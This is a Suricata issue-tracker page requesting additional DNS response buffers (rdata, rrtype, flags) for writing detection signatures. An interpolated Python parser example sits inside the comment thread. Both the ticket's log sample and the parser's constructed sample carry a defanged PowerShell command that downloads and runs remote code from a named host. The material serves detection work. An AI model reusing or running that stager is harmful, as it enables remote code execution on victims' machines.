
Feature #2448: dns: additional buffers for DNS Responses

Added by Jack Mott about 8 years ago. Updated 11 months ago.

Status: New
Priority: Normal
Assignee:
Target version:
Effort:
Difficulty:
Label: Beginner, Protocol

Description

Hi,

It would be nice to be able to include additional buffers for the DNS protocol responses to help write more efficient and effective signatures.

I think buffers for sections like rdata and rrtype should be included to cover things like data in TXT Records, but it could be expanded to cover the other sections of the response.

{
   "timestamp":"2018-02-14T19:12:58.760866-0700",
   "flow_id":345727363089610,
   "pcap_cnt":4,
   "event_type":"dns",
   "src_ip":"8.8.8.8",
   "src_port":53,
   "dest_ip":"192.168.0.105",
   "dest_port":49153,
   "proto":"UDP",
   "dns":{
      "type":"answer",
      "id":2,
      "rcode":"NOERROR",
      "rrname":"shinobotps1[.]com",
      "rrtype":"TXT",
      "ttl":3600,
      "rdata":"powershell IEX (New-Object Net.WebClient).DownloadString('hxxps:\/\/shinobotps1[.]com\/download_get.php');"
   }
}

Thanks!


Related issues (4: 2 open, 2 closed)

Related to Suricata - Feature #2198: Extend the DNS parser to accept dns_response keyword in signatures (Rejected)
Related to Suricata - Task #4097: Suricon 2020 brainstorm (Assigned to Victor Julien)
Related to Suricata - Feature #7012: rules: add dns.response sticky buffer (Closed, Nathan Scrivens)
Related to Suricata - Feature #5642: DNS: parity between log fields and detection (Assigned to Jason Ish)

#1 Updated by Jason Ish about 8 years ago

  • Related to Feature #2198: Extend the DNS parser to accept dns_response keyword in signatures added

#2 Updated by Andreas Herz about 8 years ago

  • Assignee set to OISF Dev
  • Target version set to TBD

#3 Updated by Victor Julien over 6 years ago

  • Target version changed from TBD to 6.0.0beta1

#4 Updated by Victor Julien over 6 years ago

  • Label Beginner added

#5 Updated by Victor Julien about 6 years ago

  • Label Protocol added

#6 Updated by Victor Julien almost 6 years ago

  • Target version changed from 6.0.0beta1 to 7.0.0-beta1

#7 Updated by Jason Ish over 5 years ago

  • Related to Task #4097: Suricon 2020 brainstorm added

#8 Updated by Jason Ish over 5 years ago

As discussed today in the 2020 brainstorm, this is still a desired feature. It should be more or less trivial, but could serve as an example of unifying eve-logged buffers and buffers available for detection. At the very least, the rdata buffer should be exposed as a sticky buffer for content matches.

#9 Updated by Victor Julien over 4 years ago

  • Target version changed from 7.0.0-beta1 to 8.0.0-beta1

#10 Updated by Brandon Murphy almost 3 years ago

It would be nice to have all DNS flags parsed as well, perhaps like dns.flags.z, dns.flags.replycode, etc.

Doing so would avoid the use of byte_test, which is often difficult to read for users attempting to understand the logic in a rule.
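The following is an added worked example, not Suricata code and not code posted by anyone in this thread. It shows what the buffers requested here (the header flags from #10 and rrname/rrtype/ttl/rdata from #8 and the description) look like once a response is parsed into named fields: a small Python parser walks a constructed DNS response carrying the TXT record from the ticket description, splits the flags word into its named bits instead of leaving that to a byte_test over offset 2, decodes the TXT character-strings into one rdata string, and runs a case-insensitive content match over rdata. The message bytes, the field names (chosen to mirror the EVE record) and the defanged payload text are all constructed for the example; the pointer-hop limit in decode_name is a caveat any such parser needs, since a compression pointer can point at itself.

```python
# Added example: parse a DNS response into the fields this ticket asks to expose
# (flags, rrname, rrtype, ttl, rdata) and match on them by name. Not Suricata code.
import struct

RRTYPE_NAMES = {1: "A", 5: "CNAME", 16: "TXT", 28: "AAAA"}
RCODE_NAMES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN", 5: "REFUSED"}


def encode_name(name):
    """Wire-encode a dotted name as length-prefixed labels plus the root label."""
    labels = [bytes([len(l)]) + l.encode("ascii") for l in name.split(".")]
    return b"".join(labels) + b"\x00"


def build_txt_response(txid, name, txt, ttl=3600):
    """Constructed sample: a NOERROR answer carrying one TXT record for `name`."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA set
    question = encode_name(name) + struct.pack("!HH", 16, 1)   # TXT, IN
    data = txt.encode("ascii")
    # TXT rdata is a sequence of <len><chars> strings of at most 255 bytes each
    chunks = [data[i:i + 255] for i in range(0, len(data), 255)]
    rdata = b"".join(bytes([len(c)]) + c for c in chunks)
    # 0xC00C is a compression pointer back to the question name at offset 12
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 16, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def decode_name(msg, off, max_hops=16):
    """Decode a possibly compressed name. Pointer hops are bounded so a
    pointer that refers to itself cannot keep the parser looping."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:
            hops += 1
            if hops > max_hops:
                raise ValueError("compression pointer loop")
            if end is None:
                end = off + 2          # the name ends right after the first pointer
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), end if end is not None else off


def parse_flags(flags):
    """Split the 16-bit flags word into named fields; z covers bits 4-6."""
    return {"qr": flags >> 15 & 1, "opcode": flags >> 11 & 0xF, "aa": flags >> 10 & 1,
            "tc": flags >> 9 & 1, "rd": flags >> 8 & 1, "ra": flags >> 7 & 1,
            "z": flags >> 4 & 0x7, "rcode": flags & 0xF}


def parse_rdata(rrtype, raw):
    """TXT: concatenate the character-strings; other types: hex of the raw bytes."""
    if rrtype != 16:
        return raw.hex()
    parts, i = [], 0
    while i < len(raw):
        n = raw[i]
        parts.append(raw[i + 1:i + 1 + n].decode("ascii", "replace"))
        i += 1 + n
    return "".join(parts)


def parse_response(msg):
    """Return the response as a dict whose keys mirror the EVE dns record."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off, queries, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        rrtype, _cls = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        queries.append({"rrname": name, "rrtype": RRTYPE_NAMES.get(rrtype, str(rrtype))})
    for _ in range(an):
        name, off = decode_name(msg, off)
        rrtype, _cls, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        raw = msg[off:off + rdlen]
        if len(raw) != rdlen:
            raise ValueError("truncated rdata")
        off += rdlen
        answers.append({"rrname": name, "rrtype": RRTYPE_NAMES.get(rrtype, str(rrtype)),
                        "ttl": ttl, "rdata": parse_rdata(rrtype, raw)})
    f = parse_flags(flags)
    return {"id": txid, "flags": f, "rcode": RCODE_NAMES.get(f["rcode"], str(f["rcode"])),
            "queries": queries, "answers": answers}


def match_rdata(parsed, needle, rrtype="TXT"):
    """What a nocase content match over an rdata sticky buffer would return."""
    return [a["rrname"] for a in parsed["answers"]
            if a["rrtype"] == rrtype and needle.lower() in a["rdata"].lower()]


# Constructed sample mirroring the EVE record in the ticket description
SAMPLE_TXT = ("powershell IEX (New-Object Net.WebClient)"
              ".DownloadString('hxxps://shinobotps1[.]com/download_get.php');")
SAMPLE = build_txt_response(2, "shinobotps1.com", SAMPLE_TXT)
PARSED = parse_response(SAMPLE)
```

Running `parse_response(SAMPLE)` yields flags `{qr: 1, opcode: 0, aa: 0, tc: 0, rd: 1, ra: 1, z: 0, rcode: 0}`, rcode "NOERROR", and one answer with rrname shinobotps1.com, rrtype TXT, ttl 3600 and the PowerShell stager as rdata; `match_rdata(PARSED, "downloadstring")` returns `["shinobotps1.com"]`. The rcode check a rule would otherwise write as a masked byte_test on offset 2 becomes a lookup of `flags["rcode"]`, which is the readability point made in #10; the TXT reassembly across 255-byte character-strings is why a raw content match on the packet can miss a payload that an rdata buffer would expose whole.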

#11 Updated by Jason Ish almost 2 years ago

  • Related to Feature #7012: rules: add dns.response sticky buffer added

#12 Updated by Jason Ish almost 2 years ago

  • Related to Feature #5642: DNS: parity between log fields and detection added

#13 Updated by Philippe Antoine about 1 year ago

  • Assignee changed from OISF Dev to Jason Ish

I think you are on it, Jason, right?

#14 Updated by Jason Ish about 1 year ago

  • Target version changed from 8.0.0-beta1 to 8.0.0-rc1

Largely done by #7012, and will be completed if we meet eve parity #5642.

#15 Updated by Shivani Bhardwaj about 1 year ago

  • Subject changed from Add additional buffers for DNS Responses to dns: additional buffers for DNS Responses

#16 Updated by Victor Julien 11 months ago

  • Target version changed from 8.0.0-rc1 to 9.0.0-beta1